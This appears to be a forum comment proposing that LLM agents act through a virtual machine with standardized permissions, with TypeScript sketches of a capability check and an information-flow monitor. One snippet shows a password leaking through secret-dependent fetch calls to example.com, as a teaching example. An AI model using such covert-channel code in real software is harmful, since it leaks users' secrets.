An operating system (or sandbox, or whatever) is a very large virtual machine, where the "instructions" are the normal CPU instructions plus the set of syscalls. Unfortunately, operating systems today are complicated, hard to understand, and (relatively) hard to modify. For example, there are many different ways to sandbox filesystem access (chmod, containers, chroot, sandbox-exec on macOS, etc.) and they each have bugs that have turned into "features" or subtle semantics. Plus, they are not available on all operating systems or even on all distributions of the same operating system. And then -- how do filesystem permissions and network permissions interact? Even if both of their semantics are "safe," is the composition of the two safe?
The assumption is: because operating systems are so complex, large, and underspecified, it is probably dangerous for LLMs to interact directly with the underlying operating system. We have observed this kind of failure empirically: from CVEs in C and C++ code, we know that subtle errors or small differences in semantics can cascade into huge security vulnerabilities.
To address this, the authors propose that LLMs instead interact with a virtual machine where, for example, the semantics of permissions and/or capabilities are well defined and standardized across different implementations or operating systems. (This is why they mention Java as an analogy -- the JVM gave developers the ability to write code for a vast array of architectures and operating systems without having to think about the underlying implementations.) This standardization makes it easier to understand exactly how an LLM would be allowed to interact with the outside world.
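To make "well-defined permissions" a bit more concrete, here is a minimal sketch in TypeScript of what a deny-by-default capability check for such a VM might look like. Everything in it (the `Instruction` and `Capability` types, the two operations, the `isAllowed` function) is made up for illustration and is not taken from the article; a real design would need far more care around path and host semantics.

```typescript
// Hypothetical instruction set for a tiny agent VM (names are illustrative only).
type Instruction =
  | { op: "readFile"; path: string }
  | { op: "httpGet"; host: string };

// A capability is an explicit, narrow grant: a path prefix or an exact host.
type Capability =
  | { kind: "fs.read"; prefix: string }
  | { kind: "net.get"; host: string };

// Deny by default: an instruction is allowed only if some capability covers it.
function isAllowed(instr: Instruction, caps: Capability[]): boolean {
  // Refuse any path containing a ".." segment, so a prefix grant cannot be
  // escaped with something like "/workspace/../etc/passwd".
  if (instr.op === "readFile" && instr.path.split("/").some((seg) => seg === "..")) {
    return false;
  }
  return caps.some((cap) => {
    if (instr.op === "readFile" && cap.kind === "fs.read") {
      return instr.path.startsWith(cap.prefix);
    }
    if (instr.op === "httpGet" && cap.kind === "net.get") {
      return instr.host === cap.host;
    }
    return false;
  });
}

// Example grant: read access under /workspace/ and GET requests to one host.
const exampleCaps: Capability[] = [
  { kind: "fs.read", prefix: "/workspace/" },
  { kind: "net.get", host: "example.com" },
];
```

The point of the sketch is that the whole permission model fits in one small function that behaves the same on every host, which is much easier to reason about than the combined behavior of chmod, chroot, and container settings.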
Besides semantic understanding and clarity, there are more benefits to designing a new virtual machine.
- Standardization across multiple model providers (mentioned in the article).
- Better opportunities for RLHF and constrained generation than with general Bash output.
- Can incorporate advances in programming language theory and design.
For an example of the last point: in recent years, there has been a ton of research on information flow for security and privacy (mentioned in the article). In a programming language that is aware of information flow, I can mark my bank account password as "secret" and the input to all HTTP calls as "public." The type system or some other static analysis can then verify that my password cannot possibly affect the input to any HTTP call. This is harder than you think, because information can leak through control flow and not just through data! For example, the following program never passes my password to fetch, yet it indirectly exfiltrates information about it:
if (password.startsWith("hackernews")) {
  fetch("https://example.com/a");
} else {
  fetch("https://example.com/b");
}
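Obviously, nobody would write that code, but people do write code with the same kind of bug. Timing attacks are one example: how long a secret-dependent branch takes to run leaks information about the secret.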
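Here is a rough sketch of how a runtime could catch the branch-on-password leak. It is a toy dynamic monitor, not the static type system I described, and all of the names (`Labeled`, `Monitor`, `branch`, `send`) are hypothetical. The idea is to track a label for the current control-flow context (often called the "pc label") and to refuse any public output while that context depends on a secret. The `send` method stands in for `fetch` and only records the URL, so the example makes no network calls.

```typescript
type Label = "public" | "secret";

// Join of two labels: anything combined with secret is secret.
const join = (a: Label, b: Label): Label =>
  a === "secret" || b === "secret" ? "secret" : "public";

// A value paired with its confidentiality label.
class Labeled<T> {
  constructor(readonly value: T, readonly label: Label) {}
}

class Monitor {
  // Label of the current control-flow context (the "pc label").
  private pc: Label = "public";
  // URLs that were allowed through the public sink.
  readonly sent: string[] = [];

  // Branch on a labeled condition; whichever arm runs does so under a pc
  // raised by the condition's label, and the old pc is restored afterwards.
  branch(cond: Labeled<boolean>, thenArm: () => void, elseArm: () => void): void {
    const saved = this.pc;
    this.pc = join(this.pc, cond.label);
    try {
      (cond.value ? thenArm : elseArm)();
    } finally {
      this.pc = saved;
    }
  }

  // Stand-in for fetch: a public sink. Rejects the call if either the URL
  // or the control-flow context depends on a secret.
  send(url: Labeled<string>): void {
    if (join(this.pc, url.label) === "secret") {
      throw new Error("secret data would influence a public request");
    }
    this.sent.push(url.value);
  }
}

// The leaky program from above, run under the monitor.
const monitor = new Monitor();
const password = new Labeled("correct horse", "secret");
const matches = new Labeled(password.value.startsWith("hackernews"), password.label);
try {
  monitor.branch(
    matches,
    () => monitor.send(new Labeled("https://example.com/a", "public")),
    () => monitor.send(new Labeled("https://example.com/b", "public")),
  );
} catch (e) {
  console.log("blocked:", (e as Error).message);
}
```

Both URLs are labeled public, but the request is still rejected because the decision about which one to send depends on the password. A static analysis would do the same bookkeeping at compile time and reject the program before it ever runs, which also avoids leaking anything through the runtime error itself.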